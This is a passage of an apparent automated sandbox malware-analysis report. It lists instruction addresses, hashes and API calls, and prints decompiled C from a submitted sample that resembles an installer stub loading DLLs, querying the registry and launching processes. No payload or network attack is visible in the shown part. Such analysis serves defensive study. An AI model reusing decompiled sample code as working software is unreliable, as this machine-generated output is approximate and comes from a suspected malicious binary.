                                                0x0040701c
                                                0x0040701e
                                                0x00407025
                                                0x00407026
                                                0x00407028
                                                0x0040702b
                                                0x00000000
                                                0x00000000
                                                0x00407033
                                                0x00407036
                                                0x00407039
                                                0x0040703b
                                                0x0040703d
                                                0x0040703d
                                                0x0040703e
                                                0x00407041
                                                0x00407048
                                                0x0040704b
                                                0x00407059
                                                0x00000000
                                                0x00000000
                                                0x0040732f
                                                0x0040732f
                                                0x00407332
                                                0x00407339
                                                0x00000000
                                                0x00000000
                                                0x0040733e
                                                0x0040733e
                                                0x00407342
                                                0x0040747a
                                                0x00000000
                                                0x0040747a
                                                0x00407348
                                                0x0040734b
                                                0x0040734e
                                                0x00407352
                                                0x00407355
                                                0x0040735b
                                                0x0040735d
                                                0x0040735d
                                                0x0040735d
                                                0x00407360
                                                0x00407363
                                                0x00407363
                                                0x00407363
                                                0x00407363
                                                0x00407366
                                                0x00407366
                                                0x0040736a
                                                0x004073ca
                                                0x004073cd
                                                0x004073d2
                                                0x004073d3
                                                0x004073d5
                                                0x004073d7
                                                0x004073da
                                                0x004072e6
                                                0x004072e6
                                                0x00000000
                                                0x004072ec
                                                0x004072e6
                                                0x0040736c
                                                0x00407372
                                                0x00407375
                                                0x00407378
                                                0x0040737b
                                                0x0040737e
                                                0x00407381
                                                0x00407384
                                                0x00407387
                                                0x0040738a
                                                0x0040738d
                                                0x004073a6
                                                0x004073a9
                                                0x004073ac
                                                0x004073af
                                                0x004073b3
                                                0x004073b5
                                                0x004073b5
                                                0x004073b6
                                                0x004073b9
                                                0x0040738f
                                                0x0040738f
                                                0x00407397
                                                0x0040739c
                                                0x0040739e
                                                0x004073a1
                                                0x004073a1
                                                0x004073bc
                                                0x004073c3
                                                0x00000000
                                                0x004073c5
                                                0x00000000
                                                0x004073c5
                                                0x00000000
                                                0x00407061
                                                0x00407064
                                                0x0040709a
                                                0x004071ca
                                                0x004071ca
                                                0x004071ca
                                                0x004071ca
                                                0x004071cd
                                                0x004071cd
                                                0x004071d0
                                                0x004071d2
                                                0x0040745c
                                                0x00000000
                                                0x0040745c
                                                0x004071d8
                                                0x004071db
                                                0x00000000
                                                0x00000000
                                                0x004071e1
                                                0x004071e5
                                                0x004071e8
                                                0x004071e8
                                                0x004071e8
                                                0x00000000
                                                0x004071e8
                                                0x00407066
                                                0x00407068
                                                0x0040706a
                                                0x0040706c
                                                0x0040706f
                                                0x00407070
                                                0x00407072
                                                0x00407074
                                                0x00407077
                                                0x0040707a
                                                0x00407090
                                                0x00407095
                                                0x004070cd
                                                0x004070cd
                                                0x004070d1
                                                0x004070fd
                                                0x004070ff
                                                0x00407106
                                                0x00407109
                                                0x0040710c
                                                0x0040710c
                                                0x00407111
                                                0x00407111
                                                0x00407113
                                                0x00407116
                                                0x0040711d
                                                0x00407120
                                                0x0040714d
                                                0x0040714d
                                                0x00407150
                                                0x00407153
                                                0x004071c7
                                                0x004071c7
                                                0x004071c7
                                                0x00000000
                                                0x004071c7
                                                0x00407155
                                                0x0040715b
                                                0x0040715e
                                                0x00407161
                                                0x00407164
                                                0x00407167
                                                0x0040716a
                                                0x0040716d
                                                0x00407170
                                                0x00407173
                                                0x00407176
                                                0x0040718f
                                                0x00407191
                                                0x00407194
                                                0x00407195
                                                0x00407198
                                                0x0040719a
                                                0x0040719d
                                                0x0040719f
                                                0x004071a1
                                                0x004071a4
                                                0x004071a6
                                                0x004071a9
                                                0x004071ad
                                                0x004071af
                                                0x004071af
                                                0x004071b0
                                                0x004071b3
                                                0x004071b6
                                                0x00407178
                                                0x00407178
                                                0x00407180
                                                0x00407185
                                                0x00407187
                                                0x0040718a
                                                0x0040718a
                                                0x004071b9
                                                0x004071c0
                                                0x0040714a
                                                0x0040714a
                                                0x0040714a
                                                0x0040714a
                                                0x00000000
                                                0x004071c2
                                                0x00000000
                                                0x004071c2
                                                0x004071c0
                                                0x004070d3
                                                0x004070d6
                                                0x004070d8
                                                0x004070db
                                                0x004070de
                                                0x004070e1
                                                0x004070e3
                                                0x004070e6
                                                0x004070e9
                                                0x004070e9
                                                0x004070ec
                                                0x004070ec
                                                0x004070ef
                                                0x004070f6
                                                0x004070ca
                                                0x004070ca
                                                0x004070ca
                                                0x004070ca
                                                0x00000000
                                                0x004070f8
                                                0x00000000
                                                0x004070f8
                                                0x004070f6
                                                0x0040707c
                                                0x0040707f
                                                0x00407081
                                                0x00407084
                                                0x00000000
                                                0x00000000
                                                0x00406de3
                                                0x00406de3
                                                0x00406de7
                                                0x0040742c
                                                0x00000000
                                                0x0040742c
                                                0x00406ded
                                                0x00406df0
                                                0x00406df3
                                                0x00406df6
                                                0x00406df9
                                                0x00406dfc
                                                0x00406dff
                                                0x00406e01
                                                0x00406e04
                                                0x00406e07
                                                0x00406e0a
                                                0x00406e0c
                                                0x00406e0c
                                                0x00406e0c
                                                0x00000000
                                                0x00000000
                                                0x00406f6e
                                                0x00406f6e
                                                0x00406f72
                                                0x00407438
                                                0x00000000
                                                0x00407438
                                                0x00406f78
                                                0x00406f7b
                                                0x00406f7e
                                                0x00406f81
                                                0x00406f83
                                                0x00406f83
                                                0x00406f83
                                                0x00406f86
                                                0x00406f89
                                                0x00406f8c
                                                0x00406f8f
                                                0x00406f92
                                                0x00406f95
                                                0x00406f96
                                                0x00406f98
                                                0x00406f98
                                                0x00406f98
                                                0x00406f9b
                                                0x00406f9e
                                                0x00406fa1
                                                0x00406fa4
                                                0x00406fa4
                                                0x00406fa4
                                                0x00406fa7
                                                0x00406fa9
                                                0x00406fa9
                                                0x00000000
                                                0x00000000
                                                0x004071eb
                                                0x004071eb
                                                0x004071eb
                                                0x004071ef
                                                0x00000000
                                                0x00000000
                                                0x004071f5
                                                0x004071f8
                                                0x004071fb
                                                0x004071fe
                                                0x00407200
                                                0x00407200
                                                0x00407200
                                                0x00407203
                                                0x00407206
                                                0x00407209
                                                0x0040720c
                                                0x0040720f
                                                0x00407212
                                                0x00407213
                                                0x00407215
                                                0x00407215
                                                0x00407215
                                                0x00407218
                                                0x0040721b
                                                0x0040721e
                                                0x00407221
                                                0x00407224
                                                0x00407228
                                                0x0040722a
                                                0x0040722d
                                                0x00000000
                                                0x0040722f
                                                0x00406fac
                                                0x00406fac
                                                0x00000000
                                                0x00406fac
                                                0x0040722d
                                                0x00407462
                                                0x00000000
                                                0x00000000
                                                0x00406a91
                                                0x00407499
                                                0x00407499
                                                0x00000000
                                                0x00407499
                                                0x004072e6
                                                0x0040726d
                                                0x0040726a

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 387721db96078c788ef05d401c52d1705cfc64557ecb0b14db2e4703a56ba408
                                                • Instruction ID: 82756e30bcf828709d5cbcfbd5bc5585b8b9ec353a8eaca6552b8bf5b5cc12a5
                                                • Opcode Fuzzy Hash: 387721db96078c788ef05d401c52d1705cfc64557ecb0b14db2e4703a56ba408
                                                • Instruction Fuzzy Hash: 70713371E04229CBDF28CF98C844BADBBB1FB44305F14816EE856B7291C7786A86DF45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 60%
                                                			E004020D8(void* __ebx, void* __eflags) {
                                                				struct HINSTANCE__* _t23;
                                                				struct HINSTANCE__* _t31;
                                                				void* _t32;
                                                				WCHAR* _t35;
                                                				intOrPtr* _t36;
                                                				void* _t37;
                                                				void* _t39;
                                                
                                                				_t32 = __ebx;
                                                				asm("sbb eax, 0x42a2e0");
                                                				 *(_t39 - 4) = 1;
                                                				if(__eflags < 0) {
                                                					_push(0xffffffe7);
                                                					L15:
                                                					E00401423();
                                                					L16:
                                                					 *0x42a2a8 =  *0x42a2a8 +  *(_t39 - 4);
                                                					return 0;
                                                				}
                                                				_t35 = E00402DA6(0xfffffff0);
                                                				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
                                                				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
                                                					L3:
                                                					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
                                                					_t47 = _t23 - _t32;
                                                					 *(_t39 + 8) = _t23;
                                                					if(_t23 == _t32) {
                                                						_push(0xfffffff6);
                                                						goto L15;
                                                					}
                                                					L4:
                                                					_t36 = E00406943(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
                                                					if(_t36 == _t32) {
                                                						E00405569(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
                                                					} else {
                                                						 *(_t39 - 4) = _t32;
                                                						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
                                                							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce28, 0x40a000); // executed
                                                						} else {
                                                							E00401423( *((intOrPtr*)(_t39 - 0x28)));
                                                							if( *_t36() != 0) {
                                                								 *(_t39 - 4) = 1;
                                                							}
                                                						}
                                                					}
                                                					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403B56( *(_t39 + 8)) != 0) {
                                                						FreeLibrary( *(_t39 + 8));
                                                					}
                                                					goto L16;
                                                				}
                                                				_t31 = GetModuleHandleW(_t35); // executed
                                                				 *(_t39 + 8) = _t31;
                                                				if(_t31 != __ebx) {
                                                					goto L4;
                                                				}
                                                				goto L3;
                                                			}










                                                0x004020d8
                                                0x004020d8
                                                0x004020dd
                                                0x004020e4
                                                0x004021a3
                                                0x004022f1
                                                0x004022f1
                                                0x00402c2a
                                                0x00402c2d
                                                0x00402c39
                                                0x00402c39
                                                0x004020f3
                                                0x004020fd
                                                0x00402100
                                                0x00402110
                                                0x00402114
                                                0x0040211a
                                                0x0040211c
                                                0x0040211f
                                                0x0040219c
                                                0x00000000
                                                0x0040219c
                                                0x00402121
                                                0x0040212c
                                                0x00402130
                                                0x00402170
                                                0x00402132
                                                0x00402135
                                                0x00402138
                                                0x00402164
                                                0x0040213a
                                                0x0040213d
                                                0x00402146
                                                0x00402148
                                                0x00402148
                                                0x00402146
                                                0x00402138
                                                0x00402178
                                                0x00402191
                                                0x00402191
                                                0x00000000
                                                0x00402178
                                                0x00402103
                                                0x0040210b
                                                0x0040210e
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                  • Part of subcall function 00405569: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nskE115.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                                                  • Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,Skipped: C:\Users\user\AppData\Local\Temp\nskE115.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                                                  • Part of subcall function 00405569: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nskE115.tmp\System.dll,004033ED), ref: 004055C4
                                                  • Part of subcall function 00405569: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nskE115.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nskE115.tmp\System.dll), ref: 004055D6
                                                  • Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                                                  • Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                                                  • Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                                                • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                • String ID:
                                                • API String ID: 334405425-0
                                                • Opcode ID: 5181804e5baa6bb61a2801b2f39576ccbdd871c020746768f7870043555f7144
                                                • Instruction ID: 94cae06f4fc191ca30d479cf411a95ccd627b95a6d871bbe988cbf7c6203fea7
                                                • Opcode Fuzzy Hash: 5181804e5baa6bb61a2801b2f39576ccbdd871c020746768f7870043555f7144
                                                • Instruction Fuzzy Hash: 0D21F231904104FBCF11AFA5CF48A9E7A71BF48354F20013BF501B91E0DBBD8A92965D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 84%
                                                			E0040252A(int* __ebx, char* __edi) {
                                                				void* _t17;
                                                				short* _t18;
                                                				void* _t35;
                                                				void* _t37;
                                                				void* _t40;
                                                
                                                				_t33 = __edi;
                                                				_t27 = __ebx;
                                                				_t17 = E00402DE6(_t40, 0x20019); // executed
                                                				_t35 = _t17;
                                                				_t18 = E00402DA6(0x33);
                                                				 *__edi = __ebx;
                                                				if(_t35 == __ebx) {
                                                					 *(_t37 - 4) = 1;
                                                				} else {
                                                					 *(_t37 - 0x10) = 0x800;
                                                					if(RegQueryValueExW(_t35, _t18, __ebx, _t37 + 8, __edi, _t37 - 0x10) != 0) {
                                                						L7:
                                                						 *_t33 = _t27;
                                                						 *(_t37 - 4) = 1;
                                                					} else {
                                                						if( *(_t37 + 8) == 4) {
                                                							__eflags =  *(_t37 - 0x20) - __ebx;
                                                							 *(_t37 - 4) = 0 |  *(_t37 - 0x20) == __ebx;
                                                							E0040644E(__edi,  *__edi);
                                                						} else {
                                                							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
                                                								 *(_t37 - 4) =  *(_t37 - 0x20);
                                                								_t33[0x7fe] = _t27;
                                                							} else {
                                                								goto L7;
                                                							}
                                                						}
                                                					}
                                                					_push(_t35);
                                                					RegCloseKey();
                                                				}
                                                				 *0x42a2a8 =  *0x42a2a8 +  *(_t37 - 4);
                                                				return 0;
                                                			}








                                                0x0040252a
                                                0x0040252a
                                                0x0040252f
                                                0x00402536
                                                0x00402538
                                                0x0040253f
                                                0x00402542
                                                0x0040292e
                                                0x00402548
                                                0x0040254b
                                                0x00402566
                                                0x00402596
                                                0x00402596
                                                0x00402599
                                                0x00402568
                                                0x0040256c
                                                0x00402585
                                                0x0040258c
                                                0x0040258f
                                                0x0040256e
                                                0x00402571
                                                0x0040257c
                                                0x004025f5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00402571
                                                0x0040256c
                                                0x004025fc
                                                0x004025fd
                                                0x004025fd
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nskE115.tmp,00000000,00000011,00000002), ref: 004025FD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: CloseQueryValue
                                                • String ID:
                                                • API String ID: 3356406503-0
                                                • Opcode ID: 32d568233c538a6e869ae6d2da9aa4b7db5af2625be0dadeebaf1e716edd1da1
                                                • Instruction ID: f1f7847c69b95e8b88bdf62be751073741875666d26e4aee14b76084b72d5d95
                                                • Opcode Fuzzy Hash: 32d568233c538a6e869ae6d2da9aa4b7db5af2625be0dadeebaf1e716edd1da1
                                                • Instruction Fuzzy Hash: E2116D71900219EBDF14DFA4DE589AE7774FF04345B20443BE401B62D0E7B88A45EB5E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 69%
                                                			E00401389(signed int _a4, struct HWND__* _a10) {
                                                				intOrPtr* _t6;
                                                				void* _t8;
                                                				void* _t10;
                                                				signed int _t11;
                                                				void* _t12;
                                                				signed int _t16;
                                                				signed int _t17;
                                                
                                                				_t17 = _a4;
                                                				while(_t17 >= 0) {
                                                					_t6 = _t17 * 0x1c +  *0x42a250;
                                                					if( *_t6 == 1) {
                                                						break;
                                                					}
                                                					_push(_t6); // executed
                                                					_t8 = E00401434(); // executed
                                                					if(_t8 == 0x7fffffff) {
                                                						return 0x7fffffff;
                                                					}
                                                					_t10 = E0040136D(_t8);
                                                					if(_t10 != 0) {
                                                						_t11 = _t10 - 1;
                                                						_t16 = _t17;
                                                						_t17 = _t11;
                                                						_t12 = _t11 - _t16;
                                                					} else {
                                                						_t12 = _t10 + 1;
                                                						_t17 = _t17 + 1;
                                                					}
                                                					if(_a10 != 0) {
                                                						 *0x42920c =  *0x42920c + _t12;
                                                						SendMessageW(_a10, 0x402, MulDiv( *0x42920c, 0x7530,  *0x4291f4), 0); // executed
                                                					}
                                                				}
                                                				return 0;
                                                			}










                                                0x0040138a
                                                0x004013fa
                                                0x0040139b
                                                0x004013a0
                                                0x00000000
                                                0x00000000
                                                0x004013a2
                                                0x004013a3
                                                0x004013ad
                                                0x00000000
                                                0x00401404
                                                0x004013b0
                                                0x004013b7
                                                0x004013bd
                                                0x004013be
                                                0x004013c0
                                                0x004013c2
                                                0x004013b9
                                                0x004013b9
                                                0x004013ba
                                                0x004013ba
                                                0x004013c9
                                                0x004013cb
                                                0x004013f4
                                                0x004013f4
                                                0x004013c9
                                                0x00000000

                                                APIs
                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 970bce7bfd6110042ba11e2ba34b1580a3262637bb8a43ad7db674ac8d0d0c57
                                                • Instruction ID: 40daf909c284af41af5c9cdf7f458e0296b91398e9c9917f7ae767538e8fd086
                                                • Opcode Fuzzy Hash: 970bce7bfd6110042ba11e2ba34b1580a3262637bb8a43ad7db674ac8d0d0c57
                                                • Instruction Fuzzy Hash: 1A01D131724220EBEB194B389D09B2A3698E710318F10867AF855F66F1E6788C129B5C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: Window$EnableShow
                                                • String ID:
                                                • API String ID: 1136574915-0
                                                • Opcode ID: 140fa6264d81b82be0f57579ab09ac984e5fc0a146ecb1030cf4c806b2c00349
                                                • Instruction ID: 5d3c5223d4adea09edd48fe2ddafa99b3fbee87e2958761c9001e4fb32d1ad87
                                                • Opcode Fuzzy Hash: 140fa6264d81b82be0f57579ab09ac984e5fc0a146ecb1030cf4c806b2c00349
                                                • Instruction Fuzzy Hash: C3E0D872908201CFE705EBA4EE485AE73F4EF40315710097FE401F11D1DBB54C00866D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405AEA(WCHAR* _a4) {
                                                				struct _PROCESS_INFORMATION _v20;
                                                				int _t7;
                                                
                                                				0x426710->cb = 0x44;
                                                				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426710,  &_v20); // executed
                                                				if(_t7 != 0) {
                                                					CloseHandle(_v20.hThread);
                                                					return _v20.hProcess;
                                                				}
                                                				return _t7;
                                                			}





                                                0x00405af3
                                                0x00405b13
                                                0x00405b1b
                                                0x00405b20
                                                0x00000000
                                                0x00405b26
                                                0x00405b2a

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: CloseCreateHandleProcess
                                                • String ID:
                                                • API String ID: 3712363035-0
                                                • Opcode ID: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
                                                • Instruction ID: 90cc6d476167cb297d6b140a5f1e3d8b94c2ff7c6bb70ea469832da4d223c92c
                                                • Opcode Fuzzy Hash: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
                                                • Instruction Fuzzy Hash: F2E0BFB46002097FEB109B64ED45F7B77BCEB04608F414465BD54F6150DB74A9158E7C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004068D4(signed int _a4) {
                                                				struct HINSTANCE__* _t5;
                                                				signed int _t10;
                                                
                                                				_t10 = _a4 << 3;
                                                				_t8 =  *(_t10 + 0x40a3e0);
                                                				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
                                                				if(_t5 != 0) {
                                                					L2:
                                                					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
                                                				}
                                                				_t5 = E00406864(_t8); // executed
                                                				if(_t5 == 0) {
                                                					return 0;
                                                				}
                                                				goto L2;
                                                			}





                                                0x004068dc
                                                0x004068df
                                                0x004068e6
                                                0x004068ee
                                                0x004068fa
                                                0x00000000
                                                0x00406901
                                                0x004068f1
                                                0x004068f8
                                                0x00000000
                                                0x00406909
                                                0x00000000

                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406901
                                                  • Part of subcall function 00406864: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
                                                  • Part of subcall function 00406864: wsprintfW.USER32 ref: 004068B6
                                                  • Part of subcall function 00406864: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068CA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                • String ID:
                                                • API String ID: 2547128583-0
                                                • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                • Instruction ID: b54d22b37b479e59566a9631c032e51b8c6cd741f5ea0e4d018af200ac078f8b
                                                • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                • Instruction Fuzzy Hash: 48E086335042109AE21197715D44C7B73A8AF89650307443EF947F2080DB38DC31A669
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 68%
                                                			E00405FF7(WCHAR* _a4, long _a8, long _a12) {
                                                				signed int _t5;
                                                				void* _t6;
                                                
                                                				_t5 = GetFileAttributesW(_a4); // executed
                                                				asm("sbb ecx, ecx");
